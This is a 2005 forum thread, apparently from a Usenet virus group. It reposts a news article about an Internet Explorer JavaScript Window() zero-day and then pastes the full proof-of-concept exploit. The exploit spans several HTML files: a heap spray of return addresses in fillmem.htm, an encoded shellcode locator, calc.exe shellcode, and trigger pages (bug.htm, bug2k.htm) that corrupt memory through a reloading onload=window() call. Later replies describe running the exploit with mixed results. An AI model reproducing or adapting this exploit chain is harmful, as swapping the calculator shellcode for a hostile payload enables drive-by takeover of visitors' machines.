IE has flaw of doom (All you have to do is visit a buggy page)

  • Thread starter Thread starter Virus Guy
  • Start date Start date
V

Virus Guy

http://www.theinquirer.net/?article=27850

IE has flaw of doom
All you have to do is visit a buggy page
By Nick Farrell: Tuesday 22 November 2005, 08:00

A UK group of hackers has published a zero-day exploit which puts
means IE users only have to visit a site to be attacked. Computer
Terrorism's exploit allows a remote hacker to take complete control of
a Windows system.

To prove Computer Terrorism's system worked, it posted a
proof-of-concept exploit, available here, which launches the Windows
Calculator.

http://www.frsirt.com/exploits/20051121.IEWindow0day.php

The flaw is based on a Javascript Window() vulnerability which
Microsoft has known about for several months. However Vole has been
mistakenly treating it as a low-priority denial-of-service flaw, a
spokesComputer Terrorist said.

The exploit works on fully patched Windows XP systems with default IE
installations and could be good-night Vienna to anyone using the
Microsoft browser.

Microsoft admitted that customers running Windows 2000 SP4 and Windows
XP SP2 were at risk. However Windows Server 2003 and Windows Server
2003 SP1 in their default configurations, with the Enhanced Security
Configuration turned on, are safe.

It doesn't work on Firefox browsers and some pundits are suggesting
moving over to the open sauce browser until IE is fixed.

-------------------

Is Win-98 vulnerable to this?

I was expecting the above link to actually be a functional test of the
vulnerability. I was disappointed that there was no link to an active
example of a web page constructed to test the vulnerability.

Here is the example code:

<html>

<head>
<meta http-equiv="Content-Language" content="en-gb">
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1252">
<title>Computer Terrorism - Microsoft Internet Explorer Proof of
Concept</title>
<script type="text/javascript">

function runpoc(iframecount)
{

document.getElementById('table1').rows[2].cells[0].innerHTML="<p
align=center><B>
<font color=#339966 size=1 face=Arial>&nbsp;&nbsp;&nbsp;&nbsp;loading,
please wait....
</font></p>"
document.getElementById('table1').rows[4].cells[0].innerHTML=""
document.getElementById('table1').rows[6].cells[0].innerHTML=""
document.getElementById('table1').rows[7].cells[0].innerHTML=""
document.getElementById('table1').rows[9].cells[0].innerHTML=""


top.consoleRef = open('blankWindow.htm','BlankWindow',
'width=1,height=1'
+',menubar=0'
+',toolbar=1'
+',status=0'
+',scrollbars=0'
+',left=1'
+',top=1'
+',resizable=0')

top.consoleRef.blur();

top.consoleRef.document.writeln(
'<html>'
+'<head>'
+'<title>CT</title>'
+'</head>'
+'<body onBlur=self.blur()>'
+'</body></html>'
)

self.focus() // Ensure the javascript prompt boxes are hidden in the
background


for (i=1 ; i <=iframecount ; i++)
{
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0
frameborder=0
src=fillmem.htm></iframe>')
}

if( iframecount == 8 ){
//alert('8');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0
frameborder=0
src=bug2k.htm></iframe>')
}

if( iframecount == 4 ){
//alert('4');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0
frameborder=0
src=bug.htm></iframe>')
}

//+'<iframe width=1 height=1 border=0 frameborder=0
src=bug.htm></iframe>'
//)



}
</script>
</head>

<body
onLoad="self.moveTo(0,0);self.resizeTo(screen.width,screen.height);">

<p>&nbsp;</p>
<p>&nbsp;</p>

<table border="0" width="100%" id="table1">
<tr>
<td>
<p align="center"><font color="#333333"><b><font size="1"
face="Arial">
Microsoft Internet Explorer JavaScript Window() Proof of
Concept</font></b>
</font></td>
</tr>

<tr>
<td width="98%" height="15">
<p align="center"><b><font face="Arial" size="1"
color="#333333">Select
your operating system:-</font></b></td>
</tr>
<tr>
<td width="98%" height="10"></td>
</tr>
<tr>
<td width="98%" height="27" align="center">
<p><b><font color="#339966" size="1" face="Arial">
-</font><font color="#333333"><font color="#333333" size="1"
face="Arial"> </font> </font>
<font color="#333333" size="1" face="Arial"><a href="#"
onclick="javascript:runpoc(4)">
<span style="text-decoration: none"><font color="#333333">Microsoft
Windows XP (All Service Packs)</font></span></a><font color="#333333">
</font></font>
<font color="#339966" size="1" face="Arial"> -</font></b></td>
</tr>
<tr>
<td width="98%" height="22" align="center">
<p><b><font color="#339966" size="1" face="Arial">
-</font><font color="#333333"><font color="#333333" size="1"
face="Arial"> </font> </font>
<font color="#333333" size="1" face="Arial"><a href="#"
onclick="javascript:runpoc(8)">
<span style="text-decoration: none"><font color="#333333">Microsoft
Windows 2000/Universal (Slower)</font></span></a><font
color="#333333"> </font></font>
<font color="#339966" size="1" face="Arial"> -</font></b></td>
</tr>
<tr>
<td width="98%" height="15" align="center">
</td>
</tr>
<tr>
<td width="98%" height="15" align="center">
<b><font color="#339966" face="Arial" size="1">invokes calc.exe if
successful</font></b></td>
</tr>
</table>

</body>
</html>

--------------------------------------------------------------------------------------------------------------

<-- blankWindow.htm -->

<HTML>
<TITLE>Blank Window</title>
<body></body>
</html>

--------------------------------------------------------------------------------------------------------------

<-- fillmem.htm -->

<HTML>
<HEAD>
<Script Language="JavaScript">
function load() {

var spearson=0
var eip = ""
var prep_shellcode = ""
var shellcode = ""
var fillmem = ""


//
// Address called by the bug (also serves as slide code)
//
for (spearson=1 ; spearson <=500 ; spearson++)
{
eip = eip + unescape("%u7030%u4300")
//eip = eip + unescape("%u4300")
}


//
// Create a large chunk for memory saturation
//
for (spearson=1 ; spearson <=200; spearson++)
{
fillmem = fillmem + eip
}

//
// Search for our shellcode (tagged with my initials) and copy to a
more stable area
//
prep_shellcode =
unescape("%u9090%uBA90%u4142%u4142%uF281%u1111%u1111%u4190" +
"%u1139%uFA75%u9090%uF18B%uF88B%u9057%uc933%ub966" +
"%u002d%ua5F3%u9090%u905f%ue7ff")

//
// Harmless Calc.exe
//
shellcode =
unescape("%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF")


fillmem = fillmem + prep_shellcode + shellcode

prompt(fillmem,"Computer Terrorism (UK) Ltd - Internet Explorer
Vulnerability")

}
// -->
</Script>
</head>
<TITLE>Windows Explorer Exploit</TITLE>
<body onload="setTimeout('load()',2000)">
test test test
</body>
</html>

--------------------------------------------------------------------------------------------------------------

<-- bug2k.htm -->

<html>
<TITLE>Crash2</title>
<body onload="setTimeout('main()',20000)">

<SCRIPT>

function main()
{

document.write("<TITLE>hello2</TITLE>")
document.write("<body onload=window();>")

window.location.reload()

}
</SCRIPT>
<br><br><br><br><br><br><center><FONT FACE=ARIAL SIZE 12PT>Please Wait
!
</FONT></center>


--------------------------------------------------------------------------------------------------------------

<-- bug.htm -->

<html>
<TITLE>Crash2</title>
<body onload="setTimeout('main()',6000)">

<SCRIPT>

function main()
{

document.write("<TITLE>hello2</TITLE>")
document.write("<body onload=window();>")

window.location.reload()

}
</SCRIPT>
<br><br><br><br><br><br><center><FONT FACE=ARIAL SIZE 12PT>Please Wait
!
</FONT></center>
 
Gabriele Neukam (e-mail address removed) on 11/23/2005
On that special day, Virus Guy, ([email protected]) said...


Guess why I have been using Opera since (IIRC) version five.


Gabriele Neukam

(e-mail address removed)
Click to expand...

and M$ has known about the flaw since May......
max
--
Virus Removal Instructions
http://home.neo.rr.com/manna4u/
Keeping Windows Clean
http://home.neo.rr.com/manna4u/keepingclean.html
Windows Help
http://home.neo.rr.com/manna4u/tools.html
Playing Nice on Usenet:
http://oakroadsystems.com/genl/unice.htm#xpost
Change nomail.afraid.org to gmail.com to reply
 
Boss Hog said:
[email protected] says... said:
Here is the example code:
Click to expand...


it doesn't invoke calc.exe when I tried it??? I got an active content
warning, but that was all.

[shrugs]

FWIW, I use Firefox/Opera & Thunderbird usually, I was just curious on
this one.
Click to expand...

It appears to be very machine-specific - seemingly identical boxes can
respond in different ways.
Yes - the POC works, inasmuch as it may crash IE and/or open Calc.exe, but
it doesn't appear to work reliably (which is not to say that a Real-Life
versions wouldn't/couldn't!)

--
Noel Paton (MS-MVP 2002-2006, Windows)

Nil Carborundum Illegitemi
http://www.crashfixpc.com/millsrpch.htm

http://tinyurl.com/6oztj

Please read on how to post messages to NG's
 
Virus Guy said:
http://www.theinquirer.net/?article=27850

IE has flaw of doom
All you have to do is visit a buggy page
By Nick Farrell: Tuesday 22 November 2005, 08:00

A UK group of hackers has published a zero-day exploit which puts
means IE users only have to visit a site to be attacked. Computer
Terrorism's exploit allows a remote hacker to take complete control of
a Windows system.

To prove Computer Terrorism's system worked, it posted a
proof-of-concept exploit, available here, which launches the Windows
Calculator.

http://www.frsirt.com/exploits/20051121.IEWindow0day.php
Click to expand...

Windows 98 here, I pasted the address into Exploder as it is not my default
browser,
It associated my .JPG image files with the calc. icon !!!!! funny !

I just re-associated with paint shop again.

Mich...
 
Back
Top